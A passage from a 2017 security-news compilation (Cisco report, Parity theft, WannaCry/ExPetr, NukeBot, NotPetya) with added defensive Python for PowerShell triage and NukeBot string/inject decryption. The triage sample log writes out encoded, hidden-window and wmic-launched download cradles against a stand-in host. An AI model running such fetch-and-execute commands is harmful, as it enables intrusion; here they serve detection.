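    except (ValueError, UnicodeDecodeError):
        return None


def triage(log_text: str) -> List[Dict]:
    """Return one finding per record that shows at least one fileless-launch indicator."""
    findings = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        cmd = m["cmd"]
        indicators: List[str] = []
        decoded = None
        enc = ENC_RE.search(cmd)
        if enc:
            indicators.append("encoded_command")
            decoded = decode_encoded_command(enc.group(1))
        if HIDDEN_RE.search(cmd):
            indicators.append("hidden_window")
        if WMI_RE.search(cmd):
            indicators.append("wmi_process_create")
        # Look for the cradle both in the visible command line and inside the decoded blob.
        if CRADLE_RE.search(cmd) or (decoded and CRADLE_RE.search(decoded)):
            indicators.append("download_cradle")
        if m["parent"].upper() in OFFICE_PARENTS and "powershell" in cmd.lower():
            indicators.append("office_spawned_powershell")
        if indicators:
            findings.append({"host": m["host"], "indicators": indicators, "decoded": decoded})
    return findings


def build_sample_log() -> str:
    """Constructed records: two fileless launches, one benign script, one unrelated process."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    enc = base64.b64encode(cradle.encode("utf-16le")).decode("ascii")
    return "\n".join([
        f"2017-07-19T10:02:11Z host1 parent=WINWORD.EXE cmd=powershell.exe -NoP -W Hidden -Enc {enc}",
        r"2017-07-19T10:05:40Z host2 parent=explorer.exe cmd=powershell.exe -NoProfile -File C:\scripts\backup.ps1",
        "2017-07-19T10:07:03Z host3 parent=cmd.exe cmd=wmic process call create "
        "\"powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b')\"",
        r"2017-07-19T10:09:55Z host4 parent=svchost.exe cmd=notepad.exe C:\Users\alice\notes.txt",
    ])


if __name__ == "__main__":
    for finding in triage(build_sample_log()):
        print(finding["host"], finding["indicators"])
        if finding["decoded"]:
            print("  decoded:", finding["decoded"])
```

The same checks apply unchanged to real telemetry once command lines are being recorded, for instance Windows Security event 4688 with command-line auditing enabled or Sysmon event 1; the point of decoding the base64 blob is that the cradle is only visible after decoding, which is exactly what the evasion relies on.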

The fifth trend is that attackers are relying more on anonymized and decentralized infrastructures for obfuscation in their command and control. Tor bridging services are an example -- such as Tor2web, a proxying service that allows systems on the Internet to access things that are hosted within Tor, without requiring the installation of a local Tor client application.

In most of these developments, there is a constant: the economics of hacking has turned a corner. "The modern hacking community," says the report, "is benefiting from quick and easy access to a range of useful and low-cost resources."

Cisco notes that a decline in the use of exploit kits to deliver malware has coincided with an increase in spam levels. "Adversaries who had relied heavily on exploit kits to deliver ransomware," it explains, "are turning to spam emails, including those containing macro-laden malicious documents that can defeat many sandboxing technologies because they require user interaction to infect systems and deliver payloads."

Cisco does not expect exploit kits to disappear, but "other factors, such as the greater difficulty of exploiting vulnerabilities in files built with Adobe Flash technology, may be slowing the resurgence."

One threat vector given special mention is PUP-style spyware, which is often given little attention by defenders. Cisco studied three common families, and found at least one present within 20% of 300 companies it sampled. The three families are Hola, RelevantKnowledge, and DNSChanger/DNS Unlocker. "Although operators may market spyware as services designed to protect or otherwise help users," warns the report, "the true purpose of the malware is to track and gather information about users and their organizations -- often without users' direct consent or knowledge. Spyware companies are known to sell or provide access to the data they collect, allowing third parties to harvest information with relative anonymity. That information can be used to identify critical assets, map internal infrastructures in organizations, and orchestrate targeted attacks."

Timely patching continues to be an issue. "In late 2016," says the report, "Cisco threat researchers discovered and reported three remote code-execution vulnerabilities in Memcached servers. A scan of the Internet a few months later revealed that 79 percent of the nearly 110,000 exposed Memcached servers previously identified were still vulnerable to the three vulnerabilities because they had not been patched."

The overall picture presented in Cisco's 2017 Midyear Cybersecurity Report is a mixed bag. There is some good news. "Much of the research," it concludes, "shows that defenders not only have been gaining ground on adversaries, but also developing a much better understanding of how and where threat actors operate."

But against this, it adds, attackers are evolving more destructive attacks (such as DeOS and massive scale IoT-based DDoS attacks). "That is why it has never been more important for organizations to make cybersecurity a top priority."


Hacker Steals $30 Million in Ethereum from Parity Wallets

21.7.2017 securityweek Hacking

A hacker was allegedly able to exploit a vulnerability in Ethereum wallet client Parity and steal over $30 million worth of crypto-currency.

Because of a security flaw in the Parity Ethereum client, the hacker managed to steal 153,000 Ether from multi-sig wallets created with Parity clients 1.5. Parity has issued a security alert, but updated it today to reveal that the vulnerability has been already resolved.

According to the company, the vulnerability was discovered in “Parity Wallet's variant of the standard multi-sig contract” and affects all users “with assets in a multi-sig wallet created in Parity Wallet prior to 19/07/17 23:14:56 CEST.”

Prior to releasing the fix, Parity suggested users should “immediately move assets contained in the multi-sig wallet to a secure address.”

In fact, it appears that a group of security researchers and members of the Ethereum Project decided to help move the crypto-currency out of the vulnerable wallets and took matters into their own hands by exploiting the same vulnerability to drain as many multi-sig wallets as possible.

“White Hat Group(s) were made aware of a vulnerability in a specific version of a commonly used multisig contract. This vulnerability was trivial to execute, so they took the necessary action to drain every vulnerable multisig they could find as quickly as possible. Thank you to the greater Ethereum Community that helped finding these vulnerable contracts,” the group notes on their account.

The group managed to drain over 377,116 Ether to their wallet, which is worth over $75 million. They also note that affected users will be refunded as soon as a secure multi sig wallet is created for them.

“If you hold a multisig contract that was drained, please be patient. They will be creating another multisig for you that has the same settings as your old multisig but with the vulnerability removed and will return your funds to you there,” the group says.

The hacker, on the other hand, has already started to move the stolen assets from the initial Ethereum wallet. 70,000 Ether, worth around $14 million, was already moved to seven different wallets, each containing 10,000 Ether now.

Ethereum’s value dropped from around $230 to around $200 following the hack.

Earlier this week, an unknown actor managed to hack the CoinDash official website during the company’s Token Sale and stole $7 million in Ethereum by replacing the company’s legitimate address with their own.

In early July, hackers managed to hijack a computer belonging to an employee of Bithumb, one of the world’s largest cryptocurrency exchanges, and stole significant amounts of Bitcoin and Ethereum.

“This latest incident has serious ramifications. In fact, ETH price has actually taken a dip, and is likely due to the uncertainty around this breach. Hackers exploited a vulnerability in multi-sig wallets from Parity – drastically different from the ICO CoinDash hack that happened earlier this week,” Tyler Moffitt, Senior Threat Research Analyst at cybersecurity firm Webroot, told SecurityWeek in an emailed comment.

Last year, a hack on the Ethereum holdings of DAO (a decentralized and virtual organization designed to provide funds for new projects) also resulted in a drop in the digital currency’s value.

“The key takeaway from this hack is that we're still exploring the Ethereum space and wallet security is more important than ever. As a threat researcher, I personally recommend hardware or native wallets (desktop wallets); they are the most secure, as you are in control of any transaction. Do NOT store lots of currency in exchanges that control your private address. Only use them to make trades then back out to safe addresses,” Moffitt concluded.


A King’s Ransom It is Not

20.7.2017 Kaspersky Ransomware
Hidden motivations in separate but similar destructive events

The first half of 2017 began with two intriguing ransomware events, both partly enabled by wormable exploit technology dumped by a group calling themselves “The ShadowBrokers”. These WannaCry and ExPetr ransomware events are the biggest in the sense that they spread the quickest and most effectively of known ransomware to date. With this extraordinary effectiveness and speed, one might expect that at least one of the groups would walk away with a very large cash haul. But that is not the case.

King Richard I, held for a King’s Ransom of 100,000 marks, the largest ransom in known history and, at the time, twice England’s GDP.
Both of these incidents were carried out by two very different groups that appear to have been capable of obtaining, but minimally interested in, a king’s ransom. This missing financial motivation is strange, considering the royal capabilities of the exploits that they used to deploy their ransomware.

Also unusual, and preceding and relevant to these 2017 ransomware events, is that groups carrying out aggressive, destructive acts were more straightforward about the matter. We first posted our destructive BlackEnergy (BE) findings in 2014, along with discussion of their “dstr” plugin and odd DDoS features. Allegedly BE later took down large parts of the electrical grid in Ukraine for almost a half day. Later we described the Destover components used in the worm-enabled, destructive, politically motivated Sony incident. And Shamoon and StonedDrill have been pushed in the Middle East around turbulent political situations as well. These components were all wiper technology, delivered in a very intentional and destructive manner. It’s interesting that these spectacles all coincided with large political events and interests. So this new need to cloak their destructive activity or sabotage is an interesting shared change in tactics.

WannaCry Deployment

WannaCry deployment efforts began much earlier than has been publicly discussed. Our private report subscribers received early information that the attackers were spearphishing targets globally by at least March 14th. These messages contained links to files hosted at file sharing services. When clicked, the link led to what recipients thought were resumes related to job applications with a filename “Resume.zip” containing “Job Inquiry – Resume 2017.exe”.

This executable maintained a modified Adobe pdf file icon, and dropped both more malware (droppers and downloader chains that later led to WannaCry installations) and immediately opened decoy job applications. Here is an image of one of the decoys. While we couldn’t find it online, it may be a rip of a legitimate document:


Most of these targets were soft (likely to run the exe and likely did not have advanced network defense programs in place), their locations dispersed globally, and their organizations’ profiles inconsistent.

The group attempted to deploy the first version of WannaCry ransomware to these and various other targets over the next two months, with no success or observable effort to collect bitcoin from this activity. And, even after the ETERNALBLUE spreader exploit with the DOUBLEPULSAR code and its oddly mistaken kill switch likely was hastily added to the ransomware, the attackers did not focus much more development or attention on collecting bitcoin. At one point, the actor sent a light set of messages encouraging users to pay BTC to their wallet.

This sort of inexpensive, two month long activity also may tell us a bit about the actor, their capabilities, and their interests — slow, practical, and somewhat hiding their interests in a very odd way.

While the Sony incident demonstrated the theft and use of stolen credentials and reliable lateral movement, even that credential theft required little effort on the part of the attackers. Entire spreadsheets of admin passwords were left open on network shares. Bizarre permission configurations were maintained within the network. The actor had little to do in order to spread a wiper with its audio-video payload, lob oddball jibes at Sony and its executives, post pastebin threats at movie-goers and share the company’s dirty laundry over p2p. Understanding and co-opting a software update infrastructure was unnecessary in the Sony incident. But a low-tech worming component was also built into the toolset, highly effective most likely because of a low-security environment, not because of a previously unknown 0-day component.

ExPetr Deployment

ExPetr deployment was sharp, advanced, and technically agile. The group precisely targeted a major accounting software supplier to Ukrainian organizations. They also compromised a news website in UA to further waterhole targets outside the reach of the M.E.Doc network.

Once inside the M.E.Doc network, they gained access to the software update infrastructure and used that access to further steal credentials within target customer organizations. It’s interesting that delivery of the original poisoned installer occurred in April, and the large scale wiping event occurred much later. Also, not all systems receiving attempted Telebot deployments later received an ExPetr deployment. And, not all systems receiving attempted ExPetr deployments had previously received an attempted Telebot deployment.

Oddly, the two month delay in delivering the worm-enabled ExPetr variant is unexpectedly similar to the delay we saw with WannaCry. Later, they delivered the WMI/PsExec/ETERNALBLUE/ETERNALROMANCE-weaponized ExPetr sabotage variant. But in a substantial advance from Wannacry, even if Windows systems were patched, the attackers had stolen credentials for effective lateral movement and could wipe/crypt target systems. This addition also tells us that this attacker wanted to focus on effectively operating the confines of Ukrainian-connected organizations. The worming components also didn’t generate random network connections outside of the target networks. The variant included both native win64 and win32 MSVC-compiled Mimikatz-inspired components dropped to disk and run, stealing passwords for maximum privilege and spread, like those for domain admin and various network service accounts.

The ExPetr attackers apparently did not return with widely spread taunts or messages for their targets, or drag out the incident by requesting BTC transactions for disk decryption.

Comparison Table

                                         | WannaCry                        | ExPetr
-----------------------------------------+---------------------------------+----------------------------------------------------------
Spearphishing                            | Yes – dependent                 | Minimal (if any) – reported initial entry
Waterholing                              | No                              | Yes
Supply side server compromise            | No                              | Yes
Capable of developing wormable exploit   | No                              | Seemingly not
Initial activity                         | March 14                        | April 15
Ransomware/wiper spread date             | May 12 (two months later)       | June 27 (two months later)
Targeting                                | Global and opportunistic        | Focused primarily within one country
ETERNALBLUE                              | Yes                             | Yes
ETERNALROMANCE                           | No                              | Yes
DOUBLEPULSAR                             | Yes                             | Yes (minor modification)
Advanced credential theft and spreading  | No                              | Yes
Advanced anti-malware evasion            | No                              | Yes
Wiper functionality                      | No                              | Yes
Properly implemented crypto              | No                              | Yes
Rushed mistakes                          | Unregistered kill switch domain | Not really – possibly MBR overwrite algorithm (unlikely)
Financial draw                           | No                              | Minimal
Code sharing with other projects         | Yes                             | Yes
The recent ETERNALBLUE/ETERNALROMANCE/DOUBLEPULSAR-enabled WannaCry and ExPetr incidents share similarities. Not in the sense that they were carried out by the same actor; it is most likely that they were not. One APT was rushed, opportunistic and not as technically capable as the other, while the other APT was practical, agile and focused. But we are at the start of an emerging trend for this unusual tactic: APTs camouflaging destructive targeted activity behind ransomware.


The NukeBot banking Trojan: from rough drafts to real threats
20.7.2017 Kaspersky Virus

This spring, the author of the NukeBot banking Trojan published the source code of his creation. He most probably did so to restore his reputation on a number of hacker forums: earlier, he had been promoting his development so aggressively and behaving so erratically that he was eventually suspected of being a scammer. Now, three months after the source code was published, we decided to have a look at what has changed in the banking malware landscape.

NukeBot in the wild

The publication of malware source code may be nothing new, but it still attracts attention from across the IT community and some of that attention usually goes beyond just inspecting the code. The NukeBot case was no exception: we managed to get our hands on a number of compiled samples of the Trojan. Most of them were of no interest, as they stated local subnet addresses or ‘localhost/127.0.0.1’ as the C&C address. Far fewer samples had ‘genuine’ addresses and were ‘operational’. The main functionality of this banking Trojan is to make web injections into specific pages to steal user data, but even from operational servers we only received ‘test’ injections that were included in the source code as examples.

Test injections from the NukeBot source code
The NukeBot samples that we got hold of can be divided into two main types: one with plain text strings, and the other with encrypted strings. The test samples typically belong to type 1, so we didn’t have any problems extracting the C&C addresses and other information required for analysis from the Trojan body. It was a bit more complicated with the encrypted versions – the encryption keys had to be extracted first and only after that could the string values be established. Naturally, all the above was done automatically, using scripts we had developed. The data itself is concentrated in the Trojan’s one and only procedure that is called at the very beginning of execution.

A comparison of the string initialization procedure in plain text and with encryption.
Decryption (function sub_4049F6 in the screenshot) is performed using XOR with a key.

Implementation of string decryption in Python
In order to trigger web injections, we had to imitate interaction with C&C servers. The C&C addresses can be obtained from the string initialization procedure.

When first contacting a C&C, the bot is sent an RC4 key which it uses to decrypt injections. We used this simple logic when implementing an imitation bot, and managed to collect web injections from a large number of servers.
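The two decryption steps described above (XOR string decryption and RC4 decryption of the injects) as an added example in Python. This is not Kaspersky's script; the page does not give NukeBot's string-table layout or key handling, so a repeating-key XOR over each encrypted string and a plain RC4 stream over the inject blob are assumed, and every sample value below is constructed for the demo.

```python
"""Analyst-side decryption helpers for the two steps the write-up describes:
XOR-decrypt the string table (to recover C&C addresses), then RC4-decrypt the
inject blob with the key the C&C hands out on first contact.  Added example;
the XOR scheme and string-table layout are assumptions, not NukeBot's code."""
from itertools import cycle


def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the scheme assumed for the string initialization
    procedure (sub_4049F6 in the screenshot).  XOR is its own inverse, so the
    same call also encrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (key scheduling + keystream); encryption and decryption
    are the same operation."""
    if not key:
        raise ValueError("empty key")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_string_table(blobs, key):
    """Decrypt every encrypted string; keep only printable ASCII results,
    which is a cheap sanity check that the extracted key is the right one."""
    result = []
    for blob in blobs:
        plain = xor_decrypt(blob, key)
        if plain and all(0x20 <= b < 0x7F for b in plain):
            result.append(plain.decode("ascii"))
    return result


def find_c2_addresses(strings):
    """Pick the decrypted strings that look like URLs or host:port pairs and
    drop the localhost / 127.0.0.1 values the test samples carry."""
    hits = []
    for s in strings:
        if s.startswith(("http://", "https://")) or (":" in s and s.split(":")[-1].isdigit()):
            host = s.split("//")[-1].split("/")[0].split(":")[0]
            if host not in ("127.0.0.1", "localhost"):
                hits.append(s)
    return hits


def decrypt_injects(rc4_key: bytes, blob: bytes) -> str:
    """What an imitation bot does with the C&C reply: RC4-decrypt the inject
    blob with the key received on first contact."""
    return rc4(rc4_key, blob).decode("utf-8", errors="replace")


# --- constructed sample data (not taken from a real sample) -----------------
STRING_KEY = b"\x2a\x4f"
PLAIN_STRINGS = [b"http://127.0.0.1/panel/gate.php",
                 b"http://c2.example.invalid/gate.php",
                 b"POST", b"Mozilla/5.0"]
ENCRYPTED_TABLE = [xor_decrypt(s, STRING_KEY) for s in PLAIN_STRINGS]  # XOR is symmetric

INJECT_KEY = b"constructed-rc4-key"
INJECT_TEXT = "set_url https://bank.example.invalid/login GP\n"  # constructed placeholder inject
ENCRYPTED_INJECT = rc4(INJECT_KEY, INJECT_TEXT.encode())


if __name__ == "__main__":
    strings = decrypt_string_table(ENCRYPTED_TABLE, STRING_KEY)
    print("decrypted strings:", strings)
    print("operational C&C  :", find_c2_addresses(strings))
    print("injects          :", decrypt_injects(INJECT_KEY, ENCRYPTED_INJECT))
```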

Initially, the majority of botnets only received test injects that were of no interest to us. Later, however, we identified a number of NukeBot’s ‘combat versions’. Based on an analysis of the injections we obtained, we presume the cybercriminals’ main targets were French and US banks.

Example of ‘combat-grade’ web injections
Of all the Trojan samples we obtained, 2-5% were ‘combat-grade’. However, it is still unclear if these versions were created by a few motivated cybercriminals and the use of NukeBot will taper off soon, or if the source code has fallen into the hands of an organized group (or groups) and the number of combat-grade samples is set to grow. We will continue to monitor the situation.

We also managed to detect several NukeBot modifications that didn’t have web injection functionality, and were designed to steal mail client and browser passwords. We received those samples exclusively within droppers: after unpacking, they downloaded the required utilities (such as ‘Email Password Recovery’) from a remote malicious server.

Kaspersky Lab products detect the banking Trojans of the NukeBot family as Trojan-Banker.Win32.TinyNuke. Droppers containing this banking Trojan were assigned the verdict Trojan-PSW.Win32.TinyNuke.

MD5



U.S., European Police Say 'Dark Web' Markets Shut Down

20.7.2017 securityweek CyberCrime

Washington - US and European police on Thursday announced the shutdown of two huge "dark web" marketplaces that allowed the anonymous online trade of drugs, hacking software and guns.

US Attorney General Jeff Sessions said underground websites AlphaBay and Hansa had tens of thousands of sellers of deadly drugs like fentanyl and other illicit goods serving more than 200,000 customers worldwide.

"This case, pursued by dedicated agents and prosecutors, says you are not safe, you cannot hide. We will find you, dismantle your organization and network, and we will prosecute you," Sessions said in a warning to dark web entrepreneurs. The announcement came three weeks after AlphaBay stopped functioning with no explanation.

On July 5, the Canadian national who ran AlphaBay, Alexandre Cazes, was arrested in Thailand. Earlier this week, Cazes was found dead in his Thai police cell, with police saying he apparently hanged himself with a towel.

AlphaBay's shutdown sent traffic flooding into the smaller Hansa marketplace.

But that new traffic, tens of thousands of users, was unaware that Dutch police had already secretly taken control of Hansa, giving them the ability to identify and track buyers and sellers of illicit goods.

The Hansa market has also now been shut down, said Europol executive director Rob Wainwright.

"By acting together on a global basis the law enforcement community has sent a clear message that we have the means to identify criminality and strike back, even in areas of the Dark Web," Wainwright said.

AlphaBay had been a massive marketplace for illicit goods, 10 times larger than the notorious Silk Road underground cyber marketplace shut down by the US Federal Bureau of Investigation in 2013.

At the time it was shut down, it had more than 250,000 listings for illegal drugs and toxic chemicals, according to the US Justice Department.

It also had 100,000 advertisements for guns, stolen and fraudulent personal documents, counterfeit goods, malware and computer hacking tools.

The marketplaces operated underground on the Tor network, which allows anonymity for users.

With the takedown of AlphaBay and Hansa, authorities said they have frozen millions of dollars worth of cryptocurrencies like Bitcoin used to settle online transactions without the buyers and sellers being identified.

They also seized from Cazes and his wife millions of dollars in currency, luxury cars, and homes in four countries, including a hotel he owned in Thailand.

Wainwright said the investigation had resulted in the identification of numerous organized crime figures and that intelligence leads have been distributed to law enforcement in 37 countries around the world.

"This operation is an example of the improving concerted ability of law enforcement to strike against criminals, even on the dark net," he said. "This coordinated hit against these two marketplaces is just a taste of what is to come in the future."


Apple Patches Vulnerabilities Across All Platforms

20.7.2017 securityweek Vulnerability  Apple

Apple this week released security patches for all four of its operating systems to resolve tens of security bugs in each of them.

The tech giant addressed 37 vulnerabilities with the release of macOS Sierra 10.12.6 (and Security Update 2017-003 El Capitan and Security Update 2017-003 Yosemite). The vast majority of the issues could result in arbitrary code execution. Impacted components include audio, Bluetooth, contacts, Intel graphics driver, kernel, libarchive, and libxml2, Apple reveals.

The release of iOS 10.3.3 addressed 47 vulnerabilities, many allowing for arbitrary code execution and some for unexpected application termination or information disclosure. WebKit was the most affected component, with over 20 bugs squashed in it. Kernel, Safari, messages, contacts, libarchive, and libxml2 were also among the affected components.

Tracked as CVE-2017-9417 and affecting Broadcom's BCM4354, 4358, and 4359 chips, one of the vulnerabilities could allow an attacker within range to execute arbitrary code on the Wi-Fi chip. Because said chips are used in various smartphones, including devices from HTC, LG, and Samsung, Google too addressed the issue with its latest Android patches.

Apple addressed 16 security flaws with the release of watchOS 3.2.3, including CVE-2017-9417. Kernel was affected the most, with 9 bugs resolved in it. Contacts, IOUSBFamily, libarchive, libxml2, libxpc, messages, and Wi-Fi were also impacted. These vulnerabilities could result in arbitrary code execution, unexpected application termination, information disclosure, or an app’s ability to read restricted memory.

Apple's tvOS 10.2.2 resolves 38 bugs, most of which affect WebKit and Kernel (they were addressed in iOS and watchOS as well). Most of these issues could lead to arbitrary code execution, in some cases with elevated privileges (kernel or system), Apple notes in its advisory.

Apple also released Safari 10.1.2 this week, addressing a bug in Safari Printing and 24 issues in WebKit or related to it. iTunes 12.6.2 for Windows patches 23 security issues (one in iTunes, another in libxml2, and 21 in WebKit), while iCloud for Windows 6.2.2 resolves 22 vulnerabilities (one in libxml2 and 21 in WebKit).


Tor Offers $4,000 Per Flaw in Public Bug Bounty Program

20.7.2017 securityweek Security

Tor launches bug bounty program

The Tor Project announced on Thursday the launch of a public bug bounty program. Researchers can earn thousands of dollars if they find serious vulnerabilities in the anonymity network.

The Tor Project first announced its intention to launch a bug bounty program in late December 2015. A private program was launched in January 2016 and bounty hunters managed to find three denial-of-service (DoS) flaws, including two out-of-bounds (OOB) read issues and one infinite loop, and four memory corruption vulnerabilities that have been described as “edge-case.”

Now, with support from the Open Technology Fund, Tor has launched a public bug bounty program on the HackerOne platform.

The organization is looking for vulnerabilities in the Tor network daemon and Tor Browser, including local privilege escalation, remote code execution, unauthorized access of user data, and attack methods that can be used to obtain crypto data on relays or clients.

Researchers can earn between $2,000 and $4,000 for high severity bugs. Medium severity vulnerabilities are worth between $500 and $2,000, while low severity issues will be rewarded with a minimum of $100. Even less severe problems will be rewarded with a t-shirt, stickers and a mention in Tor’s hall of fame. On its bug bounty page, the Tor Project provides examples for each category of vulnerabilities, including with CVE references.

Vulnerabilities affecting third-party libraries used by Tor can also earn between $500 and $2,000, but libraries covered by other bug bounty programs, such as OpenSSL, have been excluded.

“Tor users around the globe, including human rights defenders, activists, lawyers, and researchers, rely on the safety and security of our software to be anonymous online. Help us protect them and keep them safe from surveillance, tracking, and attacks,” said Georg Koppen, a longtime Tor browser developer.

Tor first announced its intention to launch a bug bounty program after a team of researchers from Carnegie Mellon University helped the FBI unmask users of the anonymity network by creating more than a hundred new relays on the network. The Tor Project claimed at the time that the U.S. government had paid the university at least $1 million to carry out the attack.


Firms Unite to Hunt Threats From Network to Endpoint

20.7.2017 securityweek Security

Network and Endpoint Threat Hunters Corvil and Endgame Combine to Provide Pan-Infrastructure Detection and Response

Two threat hunting and detection companies have integrated their products to give greater visibility and protection across the entire infrastructure. Corvil, with expertise in real-time traffic analysis, and Endgame, with expertise in endpoint protection, can now share threat intelligence between the two platforms with a single click.

"The challenge today between endpoint security and network security," explains David Murray, Corvil chief business development officer, "is that they often tend to exist each in their own domain, when one of infosecurity's multipliers is the ability to integrate and be able to track a threat across the network and into the endpoint."

Organizations may have dozens of different security tools and technologies that do not adequately talk to each other. "The result," says Murray, "is that security analysts remain horribly overburdened." Training existing staff to a higher skill-set, or buying in new experts, is often not an option. "It is important," he continued, "to take the intelligence and analytics that we provide and seamlessly integrate it with other security technologies. We've already done this with Cisco's Tetration. Today we're announcing two further integrations, one with Endgame and the other with Palo Alto Networks, that enable comprehensive protection from the perimeter through the network and inclusive of the endpoint."

Endgame's endpoint threat detection platform can see endpoint threats at the kernel level and in memory, but can lose visibility into the path of anomalous communication that leaves the endpoint. "Similarly," adds Murray, "anything that tries to compromise an individual host or server endpoint of any kind has to travel over the network in order to get there. By sharing intelligence back and forth between our two platforms, we're able to provide a stronger fabric for protection."

Both Corvil and Endgame share similar philosophies and have a history of protecting some of the most sensitive and attacked infrastructures: Corvil in fintech, and Endgame in defense and military. Both believe organizations cannot wait to be breached but need to take an aggressive threat-hunting approach to network defense.

"The techniques attackers use today are increasingly aggressive, complex, and difficult to detect," comments Nate Fick, Endgame's CEO. "Security solutions that only identify customer breaches after damage and loss are no longer acceptable. Corvil shares our philosophy of direct, aggressive protection. Extending the visibility, we can offer customers across the network and endpoint represents the most comprehensive solution available on the market."

Both also share the view that their role is to make hunting and protection as easy as possible for the analyst, reducing the customer's reliance on expensive expert analysts. Each has their own virtual assistant. Corvil's Cara automatically generates daily risk reports, while Endgame's Artemis is a natural-language Siri-like assistant that will answer questions like, "What is suspicious on my network today?"

"One of the things we're planning to release in the second phase of integration," Murray told SecurityWeek, "is to extend the capabilities of our respective virtual experts to give both platforms the ability to stretch much further across an attack lifecycle, and be able to triangulate information to make a more active and more precise response."

Speed in detecting a threat loses its value if there is a subsequent delay in responding to that threat. Both platforms have their own built-in response capabilities. Corvil also integrates with Palo Alto Networks (PAN) firewalls. Where PAN micro-segmentation is employed, Corvil can initiate a firewall road block to PAN to isolate the risky host. Similarly, Endgame has its own, more surgical disruptions it can introduce within the host or endpoint.

"Let's say Corvil detects a risky host," explains Murray. "With one click the analyst can see the result in Endgame, and they can trigger an action right there. Similarly, if someone is working in Endgame and has questions about the downstream communication of a suspicious host, the analyst can bring up information about the communication in Endgame and then click to Corvil to further investigate it. Corvil could initiate a firewall road block in PAN directly from Corvil. Corvil can determine the source of the bad behavior and block it so that it can no longer communicate through the firewall. Alternatively, there could be a more surgical disruption within the source through Endgame."

"By combining Endgame's heritage in protecting against nation-state adversaries with Corvil's longstanding leadership in safeguarding algorithmic businesses," says Murray, "we, uniquely, provide critical capabilities that our customers across industries require. Today's partnership with Endgame enables us to cover a wider spectrum of an organization's infrastructure and empower today's overburdened security teams."

The Corvil/Endgame integration is available from today to early adopter customers.


FedEx May Have Permanently Lost Data Encrypted by NotPetya

20.7.2017 securityweek Ransomware

FedEx-owned international delivery services company TNT Express is still working on restoring systems hit last month by the destructive NotPetya malware attack, but some business data may never be recovered, FedEx said in a Securities and Exchange Commission (SEC) filing this week.

NotPetya (also known as Nyetya, PetrWrap, exPetr, GoldenEye, and Diskcoder.C) infected tens of thousands of systems, including ones belonging to major organizations, in more than 65 countries. Many of the victims were located in Ukraine, which is not surprising considering that the main attack vector was the update system of M.E. Doc, an accounting tool developed by Kiev-based tax software firm Intellect Service.

The infosec community initially believed NotPetya was a piece of ransomware, similar to WannaCry. However, closer analysis revealed that it was actually a wiper and it was unlikely that victims could recover their files, even if they paid the ransom.

TNT Express, whose Ukraine office uses the compromised tax software, was hit hard by the attack, which led to FedEx temporarily suspending trading of its shares on the New York Stock Exchange. It’s worth noting that FedEx was also impacted by the WannaCry attack.

In its annual report with the SEC on Form 10-K for fiscal year 2017, FedEx said the attack did not affect any of its other companies. While there is no evidence that any data was stolen by malicious actors from TNT systems, the attack had a significant impact on the company’s operations and communications.

A majority of TNT services are available by now, but FedEx informed customers of possible delays in service and invoicing due to the use of manual processes. The company is working on restoring critical systems, including operational, finance, back-office and secondary business systems, but it’s unclear how long the process will take.

Furthermore, FedEx believes it’s “reasonably possible” that TNT will not be able to fully restore all affected systems and recover all the critical business data encrypted by NotPetya.

“Given the recent timing and magnitude of the attack, in addition to our initial focus on restoring TNT operations and customer service functions, we are still evaluating the financial impact of the attack, but it is likely that it will be material,” FedEx said in a press statement. “We do not have cyber or other insurance in place that covers this attack. Although we cannot currently quantify the amounts, we have experienced loss of revenue due to decreased volumes at TNT and incremental costs associated with the implementation of contingency plans and the remediation of affected systems.”

FedEx is not the only shipping company hit by NotPetya. Danish shipping giant A.P. Moller-Maersk also had its systems infected, which prevented it from accepting new orders. Maersk-owned APM Terminals, a global port and cargo inland services provider, was also affected, causing problems at major ports in the United States and Europe.

According to Reuters, Maersk admitted that its antivirus software was not effective against the NotPetya malware, and the company now claims to have implemented additional security measures to prevent future incidents.


Avast Acquires CCleaner Developer Piriform

20.7.2017 securityweek IT

Antivirus firm Avast announced on Wednesday the acquisition of Piriform, a London, UK-based company that develops the popular cleaning and optimization tool CCleaner.

While the Piriform staff will join Avast’s consumer business unit, the antivirus company wants to keep Piriform products separate from its current system optimization offering, which includes Avast Cleanup and AVG TuneUp. Avast acquired AVG last year.

The Piriform acquisition will broaden Avast’s presence in London and the companies say they will combine their expertise to deliver even better products.

CCleaner is used by more than 130 million people worldwide, including 15 million Android device users. Avast CEO Vince Steckler believes the CCleaner brand fits his company very well as they both provide high-quality free products.

Steckler also pointed out that both Avast and Piriform have strong and loyal communities whose members provide product feedback and help each other.

“I’ve seen Piriform grow from a bedroom-based hobby to a real business with billions of downloads, millions of users and a worldwide fan base. Our objective, which is to create world-class software tools that fix real world problems, has made the business what it is today,” said Lindsey Whelan, CEO of Piriform.

“We’re pleased to become part of a company which shares this objective because it means together, we can combine our expertise to deliver even better software to the people that matter most: our users,” Whelan added.

The financial terms of the deal have not been disclosed.


New CyberX Technology Predicts ICS Attack Vectors

20.7.2017 securityweek ICS

Industrial cybersecurity and threat intelligence firm CyberX announced on Thursday the availability of a new simulation technology that allows organizations to predict breach and attack vectors on their networks.

The new industrial control systems (ICS) security service, named ICS Attack Vector Prediction, leverages proprietary analytics to continuously predict possible attack avenues and help organizations prevent breaches.

The solution provides a visual representation of all possible attack chains targeting critical assets in the operational technology (OT) network. Scenarios are ranked based on the level of risk to help security teams prioritize mitigation.

Cybersecurity personnel are provided detailed mitigation recommendations for each vulnerability. This can include patching Windows devices, upgrading vulnerable PLC firmware, and disabling unnecessary or unmanaged remote access methods.

CyberX's in-house ICS security experts can also advise organizations on how to devise the most efficient and effective mitigation strategies, especially in large and globally-distributed organizations in sectors such as manufacturing, pharmaceuticals, chemicals, and oil and gas.


Security teams can easily simulate the effects of each mitigation action. For example, they can simulate patching or isolating a device in order to determine if that eliminates the risk posed to important systems.

